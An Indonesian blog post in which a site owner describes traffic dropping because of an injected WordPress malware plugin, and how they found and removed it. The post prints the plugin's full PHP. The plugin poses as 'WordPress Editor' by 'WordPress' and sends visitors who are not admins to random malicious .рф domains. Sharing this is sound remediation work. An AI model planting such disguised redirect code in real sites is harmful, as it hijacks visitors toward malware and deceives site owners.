Beberapa waktu yang lalu penulis heran, kenapa blog ini semakin hari semakin turun biasanya page views bisa sampai 100 per hari, tetapi pas tanggal 20 Februari 2021 blog ini tiba-tiba turun sangat drastis hingga cuma 10 page views saja, penulis curiga jangan-jangan web ini terkena deindex google, tetapi setelah dicek indexnya masih sama tidak ada penurunan sama sekali.
Setelah beberapa lama sejak page views menurun saya tidak memperdulikan lagi karena mungkin saja memang pengunjung sudah tidak berminat lagi baca blog ini.
Lalu penulis iseng mencari postingan tentang indopremier di google dan muncul salah satu postingan blog ini, ketika penulis klik ternyata postingannya di redirect ke website lain yang berisi malware, penulis langsung curiga jangan-jangan yang membuat pengunjung tidak mau baca blog ini dikarenakan diredirect ke website yang berisi malware, langsung penulis minta bantuan teman yang biasa mengelola hosting tempat kerja penulis. Tetapi teman penulis ini sedang sibuk sehingga tidak bisa membantu untuk memperbaikinya.
Lalu penulis mencoba scan blog ini dengan plugin Sucuri Security, dan hasilnya ada script yang mencurigakan diinject pada blog ini, tetapi plugin Sucuri Security ini tidak memberitahukan file mana atau folder mana yang terkena inject script tersebut, tetapi penulis tidak kehabisan akal, penulis coba lakukan googling, dengan keyword blog wordpress redirect malware, dan akhirnya menemukan artikel yang sangat pas, tetapi artikel tersebut tidak bisa dibuka karena artikel tersebut sudah di hapus oleh pemiliknya. Untungnya google baik masih menyimpan cache artikel tersebut sehingga artikel tersebut masih bisa diakses lewat cache google.
Ternyata script tersebut di inject pada /wp-content/plugins/Plugins/plug.php ini bisa saja berbeda dengan lokasi file di wordpress atau blog pembaca. File itu berisi seperti berikut ini:
<?php
/*
Plugin Name: WordPress Editor
Plugin URI: https://wp.com
Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.
Version: 3.0.0
Author: WordPress
Author URI: https://wp.com
License: GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
// FIX LOGIN PAGE
function is_login_page() {
return in_array($GLOBALS['pagenow'], array('wp-login.php', 'wp-register.php'));
}
function my_function() {
$is_admin = current_user_can( 'manage_options' );
$ref = $_SERVER['HTTP_REFERER'];
// LINKS
$urls = ['http://xn--90a8cf.xn--p1ai','http://xn--90a7a4a.xn--p1ai','http://xn--d1ad5e.xn--p1ai','http://xn--i1avu.xn--p1ai','http://xn--h1at3a.xn--p1ai','http://xn--k1aty.xn--p1ai','http://xn--s1afb.xn--p1ai'];
$url = "";
//$url = ;
if(!$is_admin && !empty($ref) && !is_login_page()){
header("Location: ".$urls[array_rand($urls)]);
exit();
} else{
}
}
add_action( 'wp_loaded', 'my_function' );
?>
Jika kamu memilik kasus yang sama mungkin bisa dicoba lakukan backup terlebih dahulu file tersebut lalu kalian bisa langsung hapus dari file tersebut dari server. Jika dihapus ternyata masih belum solved, silahkan isi dikolom komentar kendala yang pembaca hadapi, barangkali saya bisa ikut membantu mengatasinya.